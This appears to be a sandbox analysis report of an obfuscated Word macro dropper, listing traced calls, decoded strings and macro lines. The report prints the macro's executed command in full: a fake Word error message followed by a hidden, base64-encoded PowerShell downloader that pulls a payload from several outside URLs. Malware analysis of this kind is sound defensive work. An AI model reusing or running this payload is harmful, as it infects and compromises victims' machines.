                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: bHGFAGJ

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Paragraphs

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: UBound

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: OaOIEKmCA

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: MidB$

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: DHwdFs

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Paragraphs

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: UBound

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: mwvhyA

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: MidB$

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: prgAO

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Paragraphs

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: UBound

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: imnrzOF

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: MidB$

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: UmQHurWB

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Paragraphs

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: UBound

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: WhmkB

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: MidB$

                                                                    NDNfzBJJ

                                                                    Paragraphs

                                                                    Range

                                                                    Range

                                                                    UBound

                                                                    BLbjEJvG

                                                                    MidB$

                                                                    CreateObject

                                                                    		CreateObject("winmgmts:win32_process")

                                                                    BeNoB

                                                                    Paragraphs

                                                                    Range

                                                                    Range

                                                                    UBound

                                                                    qqdsB

                                                                    MidB$

                                                                    Mid

                                                                    Len

                                                                    		Len(" x [ sh bx [ sh bcx [ sh bmx [ sh bdx [ sh b x [ sh bcx [ sh bmx [ sh bdx [ sh b x [ sh b/x [ sh bcx [ sh b x [ sh bmx [ sh b^x [ sh bsx [ sh b^x [ sh bgx [ sh b x [ sh b%x [ sh bux [ sh bsx [ sh bex [ sh brx [ sh bnx [ sh bax [ sh bmx [ sh bex [ sh b%x [ sh b x [ sh b/x [ sh bvx [ sh b x [ sh bWx [ sh box [ sh b^x [ sh brx [ sh bdx [ sh b x [ sh bex [ sh bxx [ sh bpx [ sh b^x [ sh bex [ sh brx [ sh bix [ sh bex [ sh bnx [ sh b^x [ sh bcx [ sh bex [ sh bdx [ sh b x [ sh bax [ sh bnx [ sh b x [ sh bex [ sh brx [ sh b^x [ sh brx [ sh box [ sh brx [ sh b x [ sh btx [ sh brx [ sh byx [ sh bix [ sh b^x [ sh bnx [ sh bgx [ sh b x [ sh btx [ sh box [ sh b x [ sh box [ sh bpx [ sh b^x [ sh bex [ sh bnx [ sh b x [ sh btx [ sh bhx [ sh b^x [ sh bex [ sh b x [ sh bfx [ sh bix [ sh b^x [ sh blx [ sh bex [ sh b.x [ sh b x [ sh b&x [ sh b x [ sh bpx [ sh b^x [ sh box [ sh bwx [ sh bex [ sh b^x [ sh brx [ sh bsx [ sh b^x [ sh bhx [ sh bex [ sh b^x [ sh blx [ sh blx [ sh b^x [ sh b x [ sh b-x [ sh bwx [ sh b x [ sh bhx [ sh bix [ sh b^x [ sh bdx [ sh bdx [ sh b^x [ sh bex [ sh bnx [ sh b x [ sh b-x [ sh b^x [ sh bex [ sh b^x [ sh bnx [ sh bcx [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b IAx [ sh bBTx [ sh bAGx [ sh bUAx [ sh bVAx [ sh bAtx [ sh bAHx [ sh bYAx [ sh bQQx [ sh bBSx [ sh bAGx [ sh bkAx [ sh bYQx [ sh bBCx [ sh bAEx [ sh bwAx [ sh bZQx [ sh bAgx [ sh bACx [ sh bgAx [ sh bIgx [ sh bBUx [ sh bADx [ sh bQAx [ sh bIgx [ sh bArx [ sh bACx [ sh bIAx [ sh bSwx [ sh bBkx [ sh bADx [ sh bYAx [ sh bIgx [ sh bApx [ sh bACx [ sh bAAx [ sh bKAx [ sh bAgx [ sh bAFx [ sh bsAx [ sh bVAx [ sh bB5x [ sh bAHx [ sh bAAx [ sh bZQx [ sh bBdx [ sh bACx [ sh bgAx [ sh bIgx [ sh bB7x [ sh bADx [ sh bIAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bMAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bUAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bAAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bQAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bEAx [ sh bfQx [ sh bAix [ sh bACx [ sh bAAx [ sh bLQx [ sh bBGx [ sh bACx [ sh bAAx [ sh bJwx [ sh bByx [ sh bAGx [ sh bUAx [ sh bJwx [ sh bAsx [ sh bACx [ sh bcAx [ sh bcgx [ sh bBZx [ sh bACx [ sh bcAx [ sh bLAx [ sh bAnx [ sh bAFx [ sh bMAx [ sh bWQx [ sh bAnx [ sh bACx [ sh bwAx [ sh bJwx [ sh bBzx [ sh bAFx [ sh bQAx [ sh bZQx [ sh bAnx [ sh bACx [ sh bwAx [ sh bJwx [ sh bBjx [ sh bAHx [ sh bQAx [ sh bTwx [ sh bAnx [ sh bACx [ sh bwAx [ sh bJwx [ sh bBtx [ sh bACx [ sh b4Ax [ sh bSQx [ sh bBvx [ sh bACx [ sh b4Ax [ sh bRAx [ sh bBJx [ sh bACx [ sh bcAx [ sh bKQx [ sh bAgx [ sh bACx [ sh bkAx [ sh bOwx [ sh bAgx [ sh bACx [ sh bAAx [ sh bIAx [ sh bAgx [ sh bAFx [ sh bMAx [ sh bRQx [ sh bB0x [ sh bACx [ sh bAAx [ sh bIAx [ sh bA0x [ sh bADx [ sh bIAx [ sh bOAx [ sh bAgx [ sh bACx [ sh bgAx [ sh bIAx [ sh bAgx [ sh bAFx [ sh bsAx [ sh bVAx [ sh bBZx [ sh bAHx [ sh bAAx [ sh bZQx [ sh bBdx [ sh bACx [ sh bgAx [ sh bIgx [ sh bB7x [ sh bADx [ sh bMAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bcAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bAAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bUAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bYAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bIAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bQAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bgAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bEAx [ sh bfQx [ sh bAix [ sh bACx [ sh b0Ax [ sh bZgx [ sh bAnx [ sh bAEx [ sh bUAx [ sh bTQx [ sh bAux [ sh bAGx [ sh b4Ax [ sh bRQx [ sh bBUx [ sh bACx [ sh b4Ax [ sh bJwx [ sh bAsx [ sh bACx [ sh bcAx [ sh bZQx [ sh bByx [ sh bACx [ sh bcAx [ sh bLAx [ sh bAnx [ sh bAHx [ sh bQAx [ sh bJwx [ sh bAsx [ sh bACx [ sh bcAx [ sh bUwx [ sh bBZx [ sh bAHx [ sh bMAx [ sh bJwx [ sh bAsx [ sh bACx [ sh bcAx [ sh bTQx [ sh bAnx [ sh bACx [ sh bwAx [ sh bJwx [ sh bBzx [ sh bAEx [ sh bUAx [ sh bUgx [ sh bBWx [ sh bAGx [ sh bkAx [ sh bQwx [ sh bBFx [ sh bACx [ sh bcAx [ sh bLAx [ sh bAnx [ sh bAFx [ sh bAAx [ sh bbwx [ sh bBJx [ sh bAEx [ sh b4Ax [ sh bJwx [ sh bAsx [ sh bACx [ sh bcAx [ sh bdAx [ sh bAnx [ sh bACx [ sh bwAx [ sh bJwx [ sh bBhx [ sh bAEx [ sh b4Ax [ sh bYQx [ sh bBnx [ sh bACx [ sh bcAx [ sh bKQx [ sh bApx [ sh bACx ) -> 27204

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: bHGFAGJ

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Paragraphs

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: UBound

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: OaOIEKmCA

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: MidB$

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: DHwdFs

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Paragraphs

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: UBound

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: mwvhyA

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: MidB$

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: prgAO

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Paragraphs

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: UBound

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: imnrzOF

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: MidB$

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: UmQHurWB

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Paragraphs

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: UBound

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: WhmkB

                                                                    Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: MidB$

                                                                    SlFMhE

                                                                    Paragraphs

                                                                    Range

                                                                    Range

                                                                    UBound

                                                                    TtNYEBE

                                                                    MidB$

                                                                    Create

                                                                    		SWbemObjectEx.Create("cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IABTAGUAVAAtAHYAQQBSAGkAYQBCAEwAZQAgACgAIgBUADQAIgArACIASwBkADYAIgApACAAKAAgAFsAVAB5AHAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwByAGUAJwAsACcAcgBZACcALAAnAFMAWQAnACwAJwBzAFQAZQAnACwAJwBjAHQATwAnACwAJwBtAC4ASQBvAC4ARABJACcAKQAgACkAOwAgACAAIAAgAFMARQB0ACAAIAA0ADIAOAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQB7ADIAfQB7ADQAfQB7ADgAfQB7ADEAfQAiAC0AZgAnAEUATQAuAG4ARQBUAC4AJwAsACcAZQByACcALAAnAHQAJwAsACcAUwBZAHMAJwAsACcATQAnACwAJwBzAEUAUgBWAGkAQwBFACcALAAnAFAAbwBJAE4AJwAsACcAdAAnACwAJwBhAE4AYQBnACcAKQApACAAIAA7ACAAIAAkAEoAcgBuAHoAbQBrAHMAPQAkAEEAMQA2AEwAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAFkAMQAxAEYAOwAkAE0AMgAwAE0APQAoACcATwAxACcAKwAnADgAVwAnACkAOwAgACAAKABJAHQAZQBNACAAKAAiAFYAQQByAEkAQQBCAGwARQA6AFQANABrACIAKwAiAEQAIgArACIANgAiACkAIAAgACkALgB2AEEAbABVAGUAOgA6ACIAQwByAGUAQQBUAGAARQBkAEkAUgBlAEMAdABgAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0AJwArACcAUwBuAHUAdgB3ADIAdwB7ADAAJwArACcAfQBWACcAKwAnADQANgAnACsAJwA1ADEAcAB6AHsAMAAnACsAJwB9ACcAKQAgAC0ARgBbAEMASABhAHIAXQA5ADIAKQApADsAJABFADIAMABWAD0AKAAoACcAQgAxACcAKwAnADMAJwApACsAJwBBACcAKQA7ACAAIAAkADQAMgA4ADoAOgAiAHMARQBjAHUAYABSAGAAaQB0AHkAUABgAFIAYABPAFQAbwBjAG8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQARQBfADkAUQA9ACgAKAAnAEcAJwArACcAOQAxACcAKQArACcATgAnACkAOwAkAFcAcwB4AHcANQAyAHoAIAA9ACAAKAAnAEgAJwArACgAJwA2ADQAJwArACcAQwAnACkAKQA7ACQATAAwADQATgA9ACgAJwBWACcAKwAoACcAMQA2ACcAKwAnAEYAJwApACkAOwAkAFgAZABuADUAeABoAGcAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBTAG4AdQB2AHcAJwArACcAMgB3AHsAMAB9AFYAJwArACgAJwA0ADYANQAnACsAJwAxAHAAJwApACsAJwB6AHsAMAB9ACcAKQAtAEYAWwBDAEgAYQByAF0AOQAyACkAKwAkAFcAcwB4AHcANQAyAHoAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFgAMgA4AEcAPQAoACcAVwAwACcAKwAnADEARQAnACkAOwAkAE8AMwAzADgAXwA3ADcAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABYAGEAcAAxAGwAbQBhAD0AKAAnAHgAJwArACcAIAAnACsAKAAnAFsAJwArACcAIABzAGgAIABiADoAJwArACcALwAvACcAKQArACgAJwBjAG8AJwArACcAdwBvAHIAJwApACsAKAAnAGsAJwArACcAaQBuAGcAcABsACcAKQArACcAdQBzACcAKwAnAC4AJwArACgAJwBlAHMAJwArACcALwB3ACcAKQArACgAJwBwAC0AYQAnACsAJwBkAG0AaQBuACcAKwAnAC8ARgB4AG0AJwApACsAKAAnAE0ARQAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACcAKwAnACAAWwAnACsAJwAgACcAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKwAnAC8ALwBzAGkAbABrACcAKwAnAG8AJwApACsAKAAnAG4AYgB1ACcAKwAnAHMAaQAnACkAKwAnAG4AZQAnACsAKAAnAHMAcwAuACcAKwAnAG0AJwApACsAJwBhACcAKwAoACcAdAAnACsAJwByAGkAeABpAG4AJwArACcAZgBvAHQAZQBjACcAKwAnAGgAcwBvAGwAdQB0AGkAJwApACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACgAJwAvACcAKwAnAGoAcwAnACkAKwAoACcALwAnACsAJwBxADIANgAnACkAKwAoACcALwAhACcAKwAnAHgAIABbACcAKQArACcAIAAnACsAJwBzAGgAJwArACgAJwAgAGIAJwArACcAcwA6AC8AJwApACsAJwAvACcAKwAoACcAYgBiAGoAJwArACcAdQAnACkAKwAoACcAZwB1ACcAKwAnAGUAdABlAHIAJwArACcAaQBhACcAKQArACgAJwAuAGMAbwBtACcAKwAnAC8AcwA2AGsAJwApACsAKAAnAHMAYwAnACsAJwB4ACcAKQArACcALwAnACsAJwBaACcAKwAoACcALwAhACcAKwAnAHgAJwApACsAJwAgAFsAJwArACcAIAAnACsAJwBzACcAKwAoACcAaAAnACsAJwAgACcAKwAnAGIAcwA6AC8AJwApACsAJwAvACcAKwAoACcAdwB3ACcAKwAnAHcAJwApACsAJwAuAGIAJwArACcAaQAnACsAJwBtACcAKwAnAGMAZQAnACsAJwBwACcAKwAnAHQAaQAnACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAHcAJwArACcAcAAtAGEAZABtAGkAbgAvAHMASAB5ACcAKwAnADUAdAAvACcAKwAnACEAeAAgAFsAJwArACcAIAAnACsAJwBzACcAKwAnAGgAIABiADoALwAvAGEAcgBtAGEAawAnACkAKwAnAG8AbgAnACsAKAAnAGEAcgAnACsAJwBtAHMALgAnACsAJwBjACcAKQArACcAbwAnACsAJwBtAC8AJwArACcAdwAnACsAKAAnAHAALQBpACcAKwAnAG4AJwApACsAKAAnAGMAbAB1ACcAKwAnAGQAZQAnACsAJwBzAC8AZgB6AC8AJwArACcAIQAnACkAKwAnAHgAIAAnACsAKAAnAFsAJwArACcAIABzACcAKQArACgAJwBoACcAKwAnACAAYgA6AC8AJwArACcALwBhAGwAJwApACsAKAAnAHUAJwArACcAZwAnACsAJwByAGEAbQBhAC4AYwAnACkAKwAoACcAbwBtACcAKwAnAC4AJwApACsAJwBtACcAKwAnAHgAJwArACcALwAnACsAJwB0AC8AJwArACgAJwAyAC8AIQB4ACcAKwAnACAAJwArACcAWwAgAHMAaAAnACkAKwAoACcAIABiACcAKwAnADoAJwApACsAKAAnAC8AJwArACcALwBoAG8AJwApACsAJwBtAGUAJwArACgAJwBjAGEAcwBzAC4AYwBvACcAKwAnAG0ALwAnACsAJwB3AHAAJwApACsAKAAnAC0AYwAnACsAJwBvAG4AdAAnACkAKwAoACcAZQBuAHQAJwArACcALwBpAEYAJwArACcALwAnACkAKQAuACIAUgBlAGAAUABsAGAAQQBDAGUAIgAoACgAJwB4ACAAJwA,,) -> 0

                                                                    Koy_r2oxzs1

                                                                    X2yj58n39t50co

                                                                    kxpwbBJF

                                                                    Paragraphs

                                                                    Range

                                                                    Range

                                                                    UBound

                                                                    UYxXOcIJG

                                                                    MidB$

                                                                    StringsDecrypted Strings
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
                                                                    "x [ sh bpx [ sh b"
                                                                    "x [ sh brox [ sh bx [ sh bcex [ sh bsx [ sh bsx [ sh bx [ sh b"
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
                                                                    "x [ sh b:wx [ sh bx [ sh binx [ sh b3x [ sh b2x [ sh b_x [ sh b"
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
                                                                    "wx [ sh binx [ sh bmx [ sh bgmx [ sh btx [ sh bx [ sh b"
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
                                                                    "x [ sh bx [ sh b"
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
                                                                    LineInstructionMeta Information
                                                                    2

                                                                    Function Cfqzsexf2_k()

                                                                    3

                                                                    Goto duvyGCCDG

                                                                    executed
                                                                    4

                                                                    Set IacBICp = IFmVwCk

                                                                    IFmVwCk

                                                                    5

                                                                    Dim wzeYO, ZXUkHUDE, dWLbDBA as Long

                                                                    6

                                                                    Dim bZSWsqlD as Word.Paragraph

                                                                    7

                                                                    Dim wqMdGGa() as Byte

                                                                    8

                                                                    For Each bZSWsqlD in Tvh1u8793dltn9.Paragraphs

                                                                    Paragraphs

                                                                    9

                                                                    wqMdGGa = bZSWsqlD.Range

                                                                    Range

                                                                    10

                                                                    dscc = "sadsaccc" & bZSWsqlD.Range

                                                                    Range

                                                                    11

                                                                    ZXUkHUDE = UBound(wqMdGGa) - 1

                                                                    UBound

                                                                    12

                                                                    wzeYO = 0

                                                                    13

                                                                    Set oTxSFKM = PwelHHe

                                                                    PwelHHe

                                                                    14

                                                                    Do Until ZXUkHUDE > ZXUkHUDE

                                                                    15

                                                                    If wqMdGGa(ZXUkHUDE) = 46 Or ZXUkHUDE = ZXUkHUDE Then

                                                                    16

                                                                    dscc = "sasdsacc" & (wzeYO / 2) + 1 & " to " & (ZXUkHUDE / 2) + 1 & MidB$(wqMdGGa, wzeYO + 1, ZXUkHUDE - wzeYO + 3)

                                                                    MidB$

                                                                    17

                                                                    wzeYO = ZXUkHUDE + 2

                                                                    18

                                                                    Endif

                                                                    19

                                                                    ZXUkHUDE = ZXUkHUDE + 2

                                                                    20

                                                                    Loop

                                                                    21

                                                                    Next

                                                                    Paragraphs

                                                                    21

                                                                    duvyGCCDG:

                                                                    23

                                                                    skuwd = Ga63a6ozyok1lu + Tvh1u8793dltn9.Content + P74x_w06z8wy

                                                                    Ga63a6ozyok1lu

                                                                    Content

                                                                    P74x_w06z8wy

                                                                    26

                                                                    Goto NreFC

                                                                    27

                                                                    Set zkqnNAIz = DOUPnxsoh

                                                                    DOUPnxsoh

                                                                    28

                                                                    Dim ofBYJAJ, LfOAoxD, gNcNXLsAj as Long

                                                                    29

                                                                    Dim BMfqCFLcE as Word.Paragraph

                                                                    30

                                                                    Dim zxBvQRHoF() as Byte

                                                                    31

                                                                    For Each BMfqCFLcE in Tvh1u8793dltn9.Paragraphs

                                                                    Paragraphs

                                                                    32

                                                                    zxBvQRHoF = BMfqCFLcE.Range

                                                                    Range

                                                                    33

                                                                    dscc = "sadsaccc" & BMfqCFLcE.Range

                                                                    Range

                                                                    34

                                                                    LfOAoxD = UBound(zxBvQRHoF) - 1

                                                                    UBound

                                                                    35

                                                                    ofBYJAJ = 0

                                                                    36

                                                                    Set GXzgs = tmhzE

                                                                    tmhzE

                                                                    37

                                                                    Do Until LfOAoxD > LfOAoxD

                                                                    38

                                                                    If zxBvQRHoF(LfOAoxD) = 46 Or LfOAoxD = LfOAoxD Then

                                                                    39

                                                                    dscc = "sasdsacc" & (ofBYJAJ / 2) + 1 & " to " & (LfOAoxD / 2) + 1 & MidB$(zxBvQRHoF, ofBYJAJ + 1, LfOAoxD - ofBYJAJ + 3)

                                                                    MidB$

                                                                    40

                                                                    ofBYJAJ = LfOAoxD + 2

                                                                    41

                                                                    Endif

                                                                    42

                                                                    LfOAoxD = LfOAoxD + 2

                                                                    43

                                                                    Loop

                                                                    44

                                                                    Next

                                                                    Paragraphs

                                                                    44

                                                                    NreFC:

                                                                    46

                                                                    wjnsc = "x [ sh bpx [ sh b"

                                                                    47

                                                                    T8m6rm0ljeoit = "x [ sh brox [ sh bx [ sh bcex [ sh bsx [ sh bsx [ sh bx [ sh b"

                                                                    48

                                                                    Goto fNBrHlEAv

                                                                    49

                                                                    Set JJlPCJ = obTyv

                                                                    obTyv

                                                                    50

                                                                    Dim wJpzu, IFdNKp, KgsfYDHSH as Long

                                                                    51

                                                                    Dim rVJUDUKH as Word.Paragraph

                                                                    52

                                                                    Dim cXPNdFE() as Byte

                                                                    53

                                                                    For Each rVJUDUKH in Tvh1u8793dltn9.Paragraphs

                                                                    Paragraphs

                                                                    54

                                                                    cXPNdFE = rVJUDUKH.Range

                                                                    Range

                                                                    55

                                                                    dscc = "sadsaccc" & rVJUDUKH.Range

                                                                    Range

                                                                    56

                                                                    IFdNKp = UBound(cXPNdFE) - 1

                                                                    UBound

                                                                    57

                                                                    wJpzu = 0

                                                                    58

                                                                    Set XHCLGl = JoHgzC

                                                                    JoHgzC

                                                                    59

                                                                    Do Until IFdNKp > IFdNKp

                                                                    60

                                                                    If cXPNdFE(IFdNKp) = 46 Or IFdNKp = IFdNKp Then

                                                                    61

                                                                    dscc = "sasdsacc" & (wJpzu / 2) + 1 & " to " & (IFdNKp / 2) + 1 & MidB$(cXPNdFE, wJpzu + 1, IFdNKp - wJpzu + 3)

                                                                    MidB$

                                                                    62

                                                                    wJpzu = IFdNKp + 2

                                                                    63

                                                                    Endif

                                                                    64

                                                                    IFdNKp = IFdNKp + 2

                                                                    65

                                                                    Loop

                                                                    66

                                                                    Next

                                                                    Paragraphs

                                                                    66

                                                                    fNBrHlEAv:

                                                                    68

                                                                    Cyum5s6729q4h = "x [ sh b:wx [ sh bx [ sh binx [ sh b3x [ sh b2x [ sh b_x [ sh b"

                                                                    69

                                                                    Goto KAIEzBBDB

                                                                    70

                                                                    Set lMxOJUo = BYQeC

                                                                    BYQeC

                                                                    71

                                                                    Dim mDUMGI, KwsnJ, cwrlb as Long

                                                                    72

                                                                    Dim PlllYA as Word.Paragraph

                                                                    73

                                                                    Dim bIdgDIKT() as Byte

                                                                    74

                                                                    For Each PlllYA in Tvh1u8793dltn9.Paragraphs

                                                                    Paragraphs

                                                                    75

                                                                    bIdgDIKT = PlllYA.Range

                                                                    Range

                                                                    76

                                                                    dscc = "sadsaccc" & PlllYA.Range

                                                                    Range

                                                                    77

                                                                    KwsnJ = UBound(bIdgDIKT) - 1

                                                                    UBound

                                                                    78

                                                                    mDUMGI = 0

                                                                    79

                                                                    Set OELBME = PpRoB

                                                                    PpRoB

                                                                    80

                                                                    Do Until KwsnJ > KwsnJ

                                                                    81

                                                                    If bIdgDIKT(KwsnJ) = 46 Or KwsnJ = KwsnJ Then

                                                                    82

                                                                    dscc = "sasdsacc" & (mDUMGI / 2) + 1 & " to " & (KwsnJ / 2) + 1 & MidB$(bIdgDIKT, mDUMGI + 1, KwsnJ - mDUMGI + 3)

                                                                    MidB$

                                                                    83

                                                                    mDUMGI = KwsnJ + 2

                                                                    84

                                                                    Endif

                                                                    85

                                                                    KwsnJ = KwsnJ + 2

                                                                    86

                                                                    Loop

                                                                    87

                                                                    Next

                                                                    Paragraphs

                                                                    87

                                                                    KAIEzBBDB:

                                                                    89

                                                                    D72efu7a0how7es = "wx [ sh binx [ sh bmx [ sh bgmx [ sh btx [ sh bx [ sh b"

                                                                    90

                                                                    Goto OXSmB

                                                                    91

                                                                    Set opZGEJ = OfcyMA

                                                                    OfcyMA

                                                                    92

                                                                    Dim UZSgXY, SWiOAACq, axfnb as Long

                                                                    93

                                                                    Dim RSOyLFC as Word.Paragraph

                                                                    94

                                                                    Dim qZUuB() as Byte

                                                                    95

                                                                    For Each RSOyLFC in Tvh1u8793dltn9.Paragraphs

                                                                    Paragraphs

                                                                    96

                                                                    qZUuB = RSOyLFC.Range

                                                                    Range

                                                                    97

                                                                    dscc = "sadsaccc" & RSOyLFC.Range

                                                                    Range

                                                                    98

                                                                    SWiOAACq = UBound(qZUuB) - 1

                                                                    UBound

                                                                    99

                                                                    UZSgXY = 0

                                                                    100

                                                                    Set fFCxQGp = VFEoD

                                                                    VFEoD

                                                                    101

                                                                    Do Until SWiOAACq > SWiOAACq

                                                                    102

                                                                    If qZUuB(SWiOAACq) = 46 Or SWiOAACq = SWiOAACq Then

                                                                    103

                                                                    dscc = "sasdsacc" & (UZSgXY / 2) + 1 & " to " & (SWiOAACq / 2) + 1 & MidB$(qZUuB, UZSgXY + 1, SWiOAACq - UZSgXY + 3)

                                                                    MidB$

                                                                    104

                                                                    UZSgXY = SWiOAACq + 2

                                                                    105

                                                                    Endif

                                                                    106

                                                                    SWiOAACq = SWiOAACq + 2

                                                                    107

                                                                    Loop

                                                                    108

                                                                    Next

                                                                    Paragraphs

                                                                    108

